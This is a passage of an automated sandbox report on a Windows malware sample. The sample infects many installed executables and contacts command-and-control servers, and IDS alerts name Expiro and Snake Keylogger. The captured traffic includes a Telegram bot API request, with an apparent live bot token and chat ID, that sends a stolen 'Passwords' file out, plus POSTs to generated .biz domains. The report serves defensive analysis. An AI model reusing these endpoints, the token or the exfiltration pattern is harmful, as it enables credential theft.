            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OcPubMgr.exe.2.dr
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
            Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: updater.pdb source: armsvc.exe, 00000002.00000003.2547468354.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp

            Spreading

            barindex
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_02229220
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then lea rcx, qword ptr [0000000002D39C30h]2_3_02223AB0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_02222E10
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then mov eax, dword ptr [00000000035854B8h]2_3_0222EC54
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_0222EC84
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_0222ED67
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_0222EDA4
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 4x nop then sub rsp, 28h2_3_0222EDE4

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.11:55887 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.11:49713 -> 18.141.10.107:80
            Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.11:58700 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.11:49813 -> 82.112.184.197:80
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49711 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49711 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d2fbe638dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.11:49713
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.11:49713
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49705 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.11:49717
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.11:49717
            Source: global trafficHTTP traffic detected: POST /uljtmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /lfsgndokapxyhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: POST /illjjcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /dawajiqtqrkbbpd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xifbrctmnvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /kmpia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /brsjohajbqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
